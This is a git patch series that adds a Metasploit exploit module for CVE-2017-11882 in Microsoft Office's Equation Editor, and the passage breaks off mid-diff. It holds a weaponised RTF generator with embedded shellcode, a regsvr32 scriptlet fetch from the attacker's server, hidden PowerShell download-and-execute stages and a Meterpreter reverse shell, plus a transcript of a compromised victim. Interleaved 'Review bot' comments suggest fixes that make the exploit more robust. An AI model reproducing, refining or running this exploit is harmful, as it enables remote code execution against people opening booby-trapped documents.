From fcf2cfa13431fbf4c12275c5a9a54489c396e608 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Tue, 21 Nov 2017 14:45:56 -0500
Subject: [PATCH 01/12] Create office_ms17_11882.md
---
 .../windows/fileformat/office_ms17_11882.md | 56 +++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
diff --git a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
new file mode 100644
index 000000000000..b6b3ae81c6c1
--- /dev/null
+++ b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
@@ -0,0 +1,56 @@ +Office products within the last 17 years allow an attacker to execute arbitrary commands through memory corruption in Office documents. This occurs in how MS office fails to properly handle OLE objects in memory. Requires an victim +to open an MS `.rtf` file. In addition for the payload to be executed, the user must not open as read-only. Otherwise requires no interaction beyond that from the user. + +## Vulnerable Application + +- Microsoft Office 2016 +- Microsoft Office 2013 Service Pack 1 +- Microsoft Office 2010 Service Pack 2 +- Microsoft Office 2007 + +## Verification Steps + +1. Start msfconsole +2. Do: `use exploit/windows/fileformat/office_ms17_11882` +3. Do: `set PAYLOAD [PAYLOAD]` +4. Do: `run` + +## Options +### FILENAME +Filename to output, and location to which should be written. + + +## Example + +``` +msf > use exploit/windows/fileformat/office_ms17_11882 +msf exploit(office_ms17_11882) > set FILENAME /home/mumbai/file.rtf +FILENAME => /home/mumbai/file.rtf +msf exploit(office_ms17_11882) > set LHOST ens3 +LHOST => ens3 +msf exploit(office_ms17_11882) > set LPORT 35116 +LPORT => 35116 +msf exploit(office_ms17_11882) > run +[*] Exploit running as background job 0. + +[*] Started reverse TCP handler on 192.168.0.11:35116 +msf exploit(office_ms17_11882) > [*] Using URL: http://0.0.0.0:8080/e08qBLfVxgaJZPo +[*] Local IP: http://192.168.0.11:8080/e08qBLfVxgaJZPo +[*] Server started. +[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24 +[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending +[*] Sending stage (205379 bytes) to 192.168.0.24 +[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500 +sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > sysinfo +Computer : TEST-PC +OS : Windows 7 (Build 7601, Service Pack 1). 
+Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 1 +Meterpreter : x64/windows +meterpreter > +``` From 39a4d193a17c6f85846a58a429c0914f542bded2 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 21 Nov 2017 14:47:02 -0500 Subject: [PATCH 02/12] Create office_ms17_11882.rb --- .../windows/fileformat/office_ms17_11882.rb | 210 ++++++++++++++++++ 1 file changed, 210 insertions(+) create mode 100644 modules/exploits/windows/fileformat/office_ms17_11882.rb diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb new file mode 100644 index 000000000000..e5f44235ec1a --- /dev/null +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb 
@@ -0,0 +1,210 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::Powershell + include Msf::Exploit::EXE + + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Office CVE-2017-11882', + 'Description' => %q{ + Module exploits a flaw in the Equation Editor, developed + in 2000, that allowed any OLE object to execute in a separate + address space. Compared to original PoC, allows for a command within + a length of 109 bytes to be executed Affects Microsoft Office word for the latest + 17 years. + }, + 'Author' => ['mumbai', 'embedi', 'BlackMathIT'], + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'Nov 15 2017', + 'References' => [ + ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'], + ['URL', 'https://github.com/embedi/CVE-2017-11882'], + ['URL', 'https://github.com/BlackMathIT/2017-11882_Generator/blob/master/2017-11882_Generator.py'] + ], + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => [ + ['Automatic', {} ], + ], + 'DefaultTarget' => 0, + 'Payload' => { + 'DisableNops' => true + }, + 'DefaultOptions' => { + 'EXITFUNC' => 'thread', + 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' + } + )) + + register_options([ + OptString.new("FILENAME", [true, "Filename to save as"]) + ]) + end + + + + def generate_rtf + header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" + header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" + header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata ' + header << 
'01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' + header << '0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 
'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720079000000000000000000000000000000000000000000000000000000' + header << '00000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020ce' + header << 'a5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000' + header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000' + header << '000000000000001400000000000000010043006f006d0070004f0062006a0000000000000000000000000000000000000000000000000000000000000000000000' + header << '0000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000' + header << '0001000000660000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000' + header << '00000000000000000000000012000201ffffffff04000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000003' + header << '0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 
'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffff0100000208000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' + header << '00000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' + header << '71756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000' + header << "00000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\n" + + footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' + footer << '4500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000' + footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000400' + footer << '0000C50000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' + footer << 
'00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' + footer << '000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C' + footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C0000000000050000000902000000000500000002' + footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF' + footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090' + footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016' + footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131' + footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000' + footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100' + footer << '00030000000000' + "\n" + footer << '}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260' + "\n" + footer << "0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\n" + footer << 
"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\n" + footer << "1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\n" + footer << "0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\n" + footer << "0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\n" + footer << "002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\n" + footer << "000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\n" + footer << "0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\n" + footer << "00000000\n" + footer << "}}}\n" + footer << '\par}' + "\n" + + shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ" + shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10" + shellcode << "\x90\x90" + + payload = shellcode + payload += [0x00402114].pack("V") + payload += "\x00" * 2 + payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll" + payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first + payload = header + payload + footer + + rtf = File.new(datastore['FILENAME'], 'w') + rtf.write(payload) + rtf.close + rtf + end + + + + def gen_psh(url, *method) + ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl + + if method.include? 'string' + download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) + else + # Random filename to use, if there isn't anything set + random = "#{rand_text_alphanumeric 8}.exe" + # Set filename (Use random filename if empty) + filename = datastore['BinaryEXE-FILENAME'].blank? ? 
random : datastore['BinaryEXE-FILENAME'] + + # Set path (Use %TEMP% if empty) + path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') + + # Join Path and Filename + file = %Q(echo (#{path}+'\\#(unknown)')) + + # Generate download PowerShell command + download_string = Rex::Powershell::PshMethods.download_run(url, file) + end + + download_and_run = "#{ignore_cert}#{download_string}" + + # Generate main PowerShell command + return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) + end + + def on_request_uri(cli, _request) + if _request.raw_uri =~ /\.sct$/ + print_status("Handling initial request from #{cli.peerhost}") + payload = gen_psh("#{get_uri}", "string") + data = gen_sct_file(payload) + send_response(cli, data, 'Content-Type' => 'text/plain') + else + print_status("Stage two requested, sending...") + p = regenerate_payload(cli) + data = cmd_psh_payload(p.encoded, + payload_instance.arch.first, + remove_comspec: true, + exec_in_place: true + ) + send_response(cli, data, 'Content-Type' => 'application/octet-stream') + end + end + + + def rand_class_id + "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" + end + + + def gen_sct_file(command) + # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error). + if command == '' + return %{} + # If a command is provided, tell the target system to execute it. + else + return %{} + end + end + + + def primer + generate_rtf + end +end From fcea6fd8d4af65ee9f308c5e149caf294d5a4eb9 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 21 Nov 2017 15:00:06 -0500 Subject: [PATCH 03/12] actually create new file ;-; --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) 
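Review bot: In generate_rtf the padding step `"\x00" * (197 - payload.length)` raises a bare `ArgumentError` ("negative argument") as soon as the regsvr32 command pushes `payload` past 197 bytes, which a long SRVHOST or URIPATH is enough to do (by my count the fixed prefix is 88 bytes, leaving the 109 bytes for the command that the module description mentions), so a configuration problem surfaces as a Ruby stack trace; guard it first with `fail_with(Failure::BadConfig, "command is #{payload.length} bytes, limit is 197; shorten URIPATH/SRVHOST") if payload.length > 197`. In on_request_uri the parameter is named `_request`, the Ruby convention for an unused argument, yet it is dereferenced as `_request.raw_uri`; rename it to `request`. The call `gen_psh("#{get_uri}", "string")` interpolates a string into a string, `gen_psh(get_uri, 'string')` is equivalent. As rendered here both branches of gen_sct_file return the same empty `%{}` literal, which would make the `command == ''` test a no-op; if the scriptlet body was lost in rendering this can be ignored, otherwise the branch needs its content. The `*method` splat in gen_psh also shadows `Object#method`; `*flags` or a keyword argument reads more clearly.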
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index e5f44235ec1a..83995534f220 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -134,10 +134,10 @@ def generate_rtf payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first payload = header + payload + footer - rtf = File.new(datastore['FILENAME'], 'w') - rtf.write(payload) - rtf.close - rtf + ::File.open(datastore['FILENAME'], 'wb') do |fd| + fd.write(payload) + fd.close + end end From db4c0fcca989162c12c1e811660cfb63f9083259 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 21 Nov 2017 19:02:14 -0500 Subject: [PATCH 04/12] spelling --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 83995534f220..9592fbad757e 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -171,12 +171,12 @@ def gen_psh(url, *method) def on_request_uri(cli, _request) if _request.raw_uri =~ /\.sct$/ - print_status("Handling initial request from #{cli.peerhost}") + print_status("Handling request for .sct from #{cli.peerhost}") payload = gen_psh("#{get_uri}", "string") data = gen_sct_file(payload) send_response(cli, data, 'Content-Type' => 'text/plain') else - print_status("Stage two requested, sending...") + print_status("Delivering payload...") p = regenerate_payload(cli) data = cmd_psh_payload(p.encoded, payload_instance.arch.first, From 275f70e77e9decfd42ca6d67be3ea840f67876e1 Mon Sep 17 00:00:00 2001 
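Review bot: The `fd.close` inside the `::File.open(datastore['FILENAME'], 'wb') do |fd| ... end` block is redundant, because the block form closes the handle when the block exits (including on exceptions), so the whole write collapses to `::File.binwrite(datastore['FILENAME'], payload)`. The same redundant close survives in patch 05's `@@ -134,10 +134,12 @@` hunk, where the path is additionally built with `::File.join(Msf::Config.local_directory, datastore['FILENAME'])`; the framework's `Msf::Exploit::FILEFORMAT` mixin provides `file_create(payload)`, which does the local_directory join and the `print_good` in one call and is the conventional way fileformat modules write their output. With this change generate_rtf no longer returns the file object, which is fine since `primer` discards the result, but a one-line comment such as `# Writes the document to FILENAME; return value is unused` would make that intent explicit. generate_rtf begins before this hunk.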
From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 21 Nov 2017 19:34:04 -0500 Subject: [PATCH 05/12] better saving --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 9592fbad757e..1e52fcc476a2 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -45,7 +45,7 @@ def initialize(info = {}) )) register_options([ - OptString.new("FILENAME", [true, "Filename to save as"]) + OptString.new("FILENAME", [true, "Filename to save as", "msf.rtf"]) ]) end @@ -134,10 +134,12 @@ def generate_rtf payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first payload = header + payload + footer - ::File.open(datastore['FILENAME'], 'wb') do |fd| + path = ::File.join(Msf::Config.local_directory, datastore['FILENAME']) + ::File.open(path, 'wb') do |fd| fd.write(payload) fd.close end + print_good("Wrote payload to #{path}") end @@ -176,7 +178,7 @@ def on_request_uri(cli, _request) data = gen_sct_file(payload) send_response(cli, data, 'Content-Type' => 'text/plain') else - print_status("Delivering payload...") + print_status("Delivering payload to #{cli.peerhost}...") p = regenerate_payload(cli) data = cmd_psh_payload(p.encoded, payload_instance.arch.first, From 960893b99dca4f845cce067319c26d68b5914d8b Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Wed, 22 Nov 2017 06:36:46 -0500 Subject: [PATCH 06/12] change default payload --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 1e52fcc476a2..f87d1032fbaf 100644 
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -40,7 +40,7 @@ def initialize(info = {}) }, 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' + 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } )) From cb7f173811af79d7b8393bd2cfa33a46488e7e1f Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 28 Nov 2017 21:36:25 -0500 Subject: [PATCH 07/12] Update office_ms17_11882.rb --- .../windows/fileformat/office_ms17_11882.rb | 160 +++++++++++------- 1 file changed, 103 insertions(+), 57 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index f87d1032fbaf..47d486f73444 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Powershell include Msf::Exploit::EXE + include Msf::Exploit::FILEFORMAT def initialize(info = {}) @@ -38,6 +39,7 @@ def initialize(info = {}) 'Payload' => { 'DisableNops' => true }, + 'Stance' => Msf::Exploit::Stance::Aggressive, 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' 
@@ -55,54 +57,107 @@ def generate_rtf header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n" header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n" header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata ' - header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' - header << '0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 
'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720079000000000000000000000000000000000000000000000000000000' - header << '00000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020ce' - header << 'a5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000' - header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000' - header << '000000000000001400000000000000010043006f006d0070004f0062006a0000000000000000000000000000000000000000000000000000000000000000000000' - header << '0000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000' - header << '0001000000660000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000' - header << '00000000000000000000000012000201ffffffff04000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000003' - header << 
'0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffff0100000208000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - header << '00000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' - header << '71756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000' - header << "00000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\n" + header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000' + header << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' + header << '09000600000000000000000000000100000001000000000000000010000002000' + header << 
'00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040' + header << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 
